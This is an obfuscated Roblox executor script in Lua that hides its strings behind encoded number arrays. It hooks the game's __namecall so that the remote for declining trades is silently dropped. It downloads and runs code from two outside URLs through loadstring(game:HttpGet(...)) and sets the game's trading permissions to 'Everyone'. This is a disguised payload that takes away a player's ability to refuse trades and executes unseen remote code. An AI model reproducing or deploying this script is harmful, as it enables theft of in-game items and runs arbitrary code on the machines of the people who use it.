local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
function osaqyDUcwXTckdMigVAOYlnc(data) m=string.sub(data, 0, 55) data=data:gsub(m,'')

data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end


 


function MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE(code)res=osaqyDUcwXTckdMigVAOYlnc('KqdYCluWbZKOBZERDbLukPTgJnsQKINAFIySFOFjfkLnUjPkrPOpXfp')for i in ipairs(code)do res=res..string.char(code[i]/105)end return res end 


pcall(function()
    local declince = game:GetService(MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({8610,10605,11760,11340,11025,10395,10185,12180,10605,10500,8715,12180,11655,11970,10185,10815,10605})).Packages._Index:FindFirstChild(MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({12075,11340,10605,11025,12180,11550,11025,10395,11235,9975,11550,10605,12180,6720,5040,4830,5145,4830,5040})).net:FindFirstChild(MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({8610,7350,4935,8820,11970,10185,10500,11025,11550,10815,4935,7035,10185,11550,10395,10605,11340,8820,11970,10185,10500,10605}))
    local __namecall;
    __namecall = hookfunction(game, MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({9975,9975,11550,10185,11445,10605,10395,10185,11340,11340}), function(self, ...)
        if self == declince and getnamecallmethod() == MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({7665,11550,12390,11655,11235,10605,8715,10605,11970,12390,10605,11970}) then
            return
        end
        return __namecall(self, ...)
    end)
end)

loadstring(game:HttpGet(MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({10920,12180,12180,11760,12075,6090,4935,4935,10605,10815,11655,11970,11025,11235,12285,12075,10185,4830,12075,11760,10185,10395,10605,4935,5985,5145,5250,5880,5880,5250,5670,10290,10290,5145,5355,10290,5040,5145,10710,10710,10290,5880,10395,5040,10290,10500,5670,10290,4830,11340,12285,10185}), true))()

loadstring(game:HttpGet(MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({10920,12180,12180,11760,12075,6090,4935,4935,11970,10185,12495,4830,10815,11025,12180,10920,12285,10290,12285,12075,10605,11970,10395,11655,11550,12180,10605,11550,12180,4830,10395,11655,11445,4935,8400,10185,12495,12075,8820,10920,10605,8400,10185,12495,4935,8400,11340,12285,12180,11655,11550,11025,12285,11445,4830,6825,6825,4935,11445,10185,11025,11550,4935,8400,11340,12285,12180,11655,11550,11025,12285,11445,4830,7980,11655,10185,10500,10605,11970,4830,11340,12285,10185}), true))()

local args = {
    [1] = MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({9030,11025,10605,12495,7665,11550,12390,10605,11550,12180,11655,11970,12705}),
    [2] = MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({7245,12390,10605,11970,12705,11655,11550,10605})
}

game:GetService(MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({8610,10605,11760,11340,11025,10395,10185,12180,10605,10500,8715,12180,11655,11970,10185,10815,10605})).Packages._Index:FindFirstChild(MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({12075,11340,10605,11025,12180,11550,11025,10395,11235,9975,11550,10605,12180,6720,5040,4830,5145,4830,5040})).net:FindFirstChild(MQNgYfUTSaIgwWDQxbiWaZjjUTBTGNQdCjRWmrxqxLOIPebvCyPkzfHWHjIfvCeLeaTxTLFyaJXzE({8610,7350,4935,8820,11970,10185,10500,11025,11550,10815,4935,8715,10605,12180,8715,10605,12180,12180,11025,11550,10815})):InvokeServer(unpack(args))        
